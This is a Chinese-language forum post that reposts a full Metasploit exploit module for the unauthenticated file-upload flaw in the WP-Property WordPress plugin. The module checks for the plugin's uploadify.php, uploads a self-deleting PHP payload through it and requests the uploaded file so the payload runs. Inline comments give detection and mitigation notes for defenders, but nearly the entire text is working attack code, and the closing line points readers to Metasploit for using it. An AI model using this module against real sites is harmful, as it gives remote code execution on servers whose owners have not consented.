
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞

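##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0 according to the module description).
#
# Notes for defenders reading this listing:
# * The only endpoint touched is
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   under the WordPress base path.
# * The observable sequence is a GET to that script (check), then a
#   multipart POST to it carrying a "Filedata" part whose filename ends in
#   ".php" and a "folder" part, then a GET for the path the server returned.
#   Web-server access logs and WAF rules keyed on that path and on PHP
#   filenames in the upload are the natural detection points.
# * Mitigation: update the plugin past the affected range, remove or block
#   access to the bundled uploadify.php, and deny PHP execution in
#   directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum rendering had corrupted this constant; the matching require is
  # 'msf/core/exploit/php_exe'. Presumably the source of
  # get_write_exec_payload used in #exploit.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the single
  # TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Requests the plugin's uploadify.php and reports whether it is reachable.
  #
  # NOTE(review): a 200 response only shows that the script exists at that
  # path. The plugin version is never read and no upload is attempted, so
  # Appears can be returned for an installation that is not actually
  # affected. Treat the result as "script exposed", not "confirmed vulnerable".
  #
  # @return [Exploit::CheckCode::Unknown] no response, or a non-200 status
  # @return [Exploit::CheckCode::Appears] the script answered with 200
  def check
    uri =  target_uri.path
    # NOTE(review): << appends in place to the string returned by
    # target_uri.path; whether that object is shared depends on the framework.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Sends the multipart upload to uploadify.php and then requests the path
  # the server returned in its response body.
  #
  # Fails with UnexpectedReply when there is no response, the status is not
  # 200, or the body does not contain the generated filename.
  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name with a .php extension; the extension is what a
    # server-side allow-list on uploads would have to reject.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # presumably :unlink_self asks the stub to delete the uploaded file after
    # it runs (confirm against PhpEXE); if so, the file may not remain on disk
    # for later forensics and the access log is the durable record.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form parts: the file itself ("Filedata") and the destination
    # directory ("folder"), which is supplied by the client.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Removes the CRLF in front of a boundary marker that starts a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the follow-up GET.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end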
不要问我这写的是什么 怎么利用 我是说msf.



